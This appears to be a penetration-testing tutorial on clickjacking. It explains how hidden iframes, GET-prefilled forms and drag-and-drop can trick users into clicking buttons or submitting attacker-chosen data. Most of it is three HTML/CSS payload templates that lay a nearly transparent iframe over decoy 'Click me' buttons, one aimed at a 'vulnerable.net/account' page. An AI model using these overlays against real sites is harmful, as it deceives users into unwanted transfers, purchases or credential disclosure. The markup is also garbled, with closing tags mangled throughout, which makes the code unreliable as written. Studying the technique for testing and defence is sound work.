Clickjacking

Clickjacking is an attack that tricks a user into clicking a webpage element which is invisible or disguised as another element. This can cause users to unwittingly download malware, visit malicious web pages, provide credentials or sensitive information, transfer money, or purchase products online. (From here).

Sometimes is possible to fill the value of fields of a form using GET parameters when loading a page. An attacker may abuse this behaviours to fill a form with arbitrary data and send the clickjacking payload so the user press the button Submit.

If you need the user to fill a form but you don't want to directly ask him to write some specific information (like your email or and specific password that you know), you can just ask him to Drag&Drop something that will write your controlled data like in this example.

<style>   iframe {       position:relative;       width: 500px;       height: 700px;       opacity: 0.1;       z-index: 2;   }   div {       position:absolute;       top:470px;       left:60px;       z-index: 1;   }style><div>Click mediv>

<style>   iframe {       position:relative;       width: 500px;       height: 500px;       opacity: 0.1;       z-index: 2;   }   .firstClick, .secondClick {       position:absolute;       top:330px;       left:60px;       z-index: 1;   }   .secondClick {       left:210px;   }style><div class="firstClick">Click me firstdiv><div class="secondClick">Click me nextdiv><iframe src="https://vulnerable.net/account">iframe>

<html><head><style>#payload{position: absolute;top: 20px;}iframe{width: 1000px;height: 675px;border: none;}.xss{position: fixed;background: #F00;}style>head><body><div style="height: 26px;width: 250px;left: 41.5%;top: 340px;" class="xss">.div><div style="height: 26px;width: 50px;left: 32%;top: 327px;background: #F8F;" class="xss">1. Click and press delete buttondiv><div style="height: 30px;width: 50px;left: 60%;bottom: 40px;background: #F5F;" class="xss">3.Click mediv>